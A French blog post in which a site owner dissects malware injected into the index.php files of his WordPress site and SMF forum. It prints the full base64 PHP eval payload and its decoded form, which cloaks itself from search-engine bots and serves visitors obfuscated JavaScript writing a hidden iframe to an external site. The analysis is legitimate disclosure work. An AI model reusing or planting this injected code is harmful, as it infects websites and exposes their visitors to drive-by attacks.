Hack de site… on continue

Par Cedric Guizelin, le 17 novembre 2011

Bienvenue! Si vous aimez ce site, alors abonnez vous au flux RSS pour être tenu informé des mises à jour.

cross grey small Hack de site... on continue Wordpress Image Fichiers

Cet article a été publié il y a 6 mois 6 jours, il est donc possible qu’il ne soit plus à jour. Les informations proposées sont donc peut-être expirées.

J’ai décidé d’explorer plus avant les fichiers de ce site, WordPress, mais aussi forum SMF lui aussi infecté.

J’ai trouvé au début des fichiers index.php des deux sites un code ajouté:

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkNUlHNG9NeWw3TlNCaVBWd25lRnduT3pVZ09EMW1JR3NvS1R0c0tEVWdhVDB3TzJrOGVqdHBLeXNwZXpoYllpNW5LR2srUGpRcEsySXVaeWhwSmtJcFhUMTFMbllvYVNsOVpDZ2hNeTUwS0M5ZVcyRXRjaTA1WFNva0wya3BLVzhnY1R0a0tETXVhQ1V5S1RNOVhDY3dYQ2NyTXpzMUlHMDlNeTVvT3pVZ056MW1JR3NvS1RzMUlHbzlNRHRzS0RVZ2FUMHdPMms4YlR0cEt6MHlLWHMzVzJvcksxMDlPRnN6TG5Bb2FTd3lLVjE5YnlBM0xrRW9YQ2RjSnlsOVpDaGpMall1UXloY0p6WTlaVnduS1QwOUxURXBlMk11UkNodUtGd25jMXduS1NrN1l5NDJQVnduTmoxM1BXVmNKMzBuTERRd0xEUXdMQ2Q4Zkh4a1lYUmhmSHgyWVhKOFkyOXZhMmxsZkhKbGMzVnNkSHhpTVRaZmJXRndmSHg4WWpFMlgyUnBaMmwwYzN4a2IyTjFiV1Z1ZEh4cFpueGxibUZpYkdWa2ZHNWxkM3hqYUdGeVFYUjhiR1Z1WjNSb2ZIeDhRWEp5WVhsOFptOXlmR3hzZkdoRVkyUjhjbVYwZFhKdWZITjFZbk4wY254bVlXeHpaWHhtTUh3ell6WTBOamszTmpJd056TTNORGM1Tm1NMk5UTmtNakkzTURabU56TTJPVGMwTmprMlpqWmxNMkV5TURZeE5qSTNNelptTm1NM05UYzBOalV6WWpJd05tTTJOVFkyTnpRellUSXdNbVF6TVRNNU16a3pPRGN3TnpnellqSXdOelEyWmpjd00yRXlNREprTXpJek9UTTVNelUzTURjNE0ySXlNak5sTTJNMk9UWTJOekkyTVRaa05qVXlNRGMzTmprMk5EYzBOamd6WkRJeU16TXlNakl3TmpnMk5UWTVOamMyT0RjME0yUXlNak16TWpJeU1EY3pOekkyTXpOa01qSTJPRGMwTnpRM01ETmhNbVl5WmpNMk5qUTJORFpoTXprek5qTTBOamt5WlRZek5qVXlaVFprTnpNeVpqWTVNbVUzTURZNE56QXpaalkzTm1ZelpETXhNakl6WlROak1tWTJPVFkyTnpJMk1UWmtOalV6WlROak1tWTJORFk1TnpZelpYeHRZWFJqYUh4VGRISnBibWQ4Wm5KdmJVTm9ZWEpEYjJSbGZHVnVZV0pzWldSamIyOXJhV1Y4TURFeU16UTFOamM0T1dGaVkyUmxabnhtZFc1amRHbHZibnd5TlRaOGFtOXBibnd4Tlh4cGJtUmxlRTltZkhkeWFYUmxKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLVHd2YzJOeWFYQjBQZz09Iik7DQp9'));

Ouh le pervers, codé en base64… et deux fois encore!!! decodons

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k1){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1)}}return p}('y n(3){5 b=\'x\';5 8=f k();l(5 i=0;i<z;i++){8[b.g(i>>4)+b.g(i&B)]=u.v(i)}d(!3.t(/^[a-r-9]*$/i))o q;d(3.h%2)3=\'0\'+3;5 m=3.h;5 7=f k();5 j=0;l(5 i=0;i<m;i+=2){7[j++]=8[3.p(i,2)]}o 7.A(\'\')}d(c.6.C(\'6=e\')==-1){c.D(n(\'s\'));c.6=\'6=w=e\'}',40,40,'|||data||var|cookie|result|b16_map|||b16_digits|document|if|enabled|new|charAt|length|||Array|for|ll|hDcd|return|substr|false|f0|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393870783b20746f703a202d3239393570783b223e3c696672616d652077696474683d223322206865696768743d223322207372633d22687474703a2f2f3664646a393634692e63652e6d732f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|match|String|fromCharCode|enabledcookie|0123456789abcdef|function|256|join|15|indexOf|write'.split('|'),0,{}))</script>
}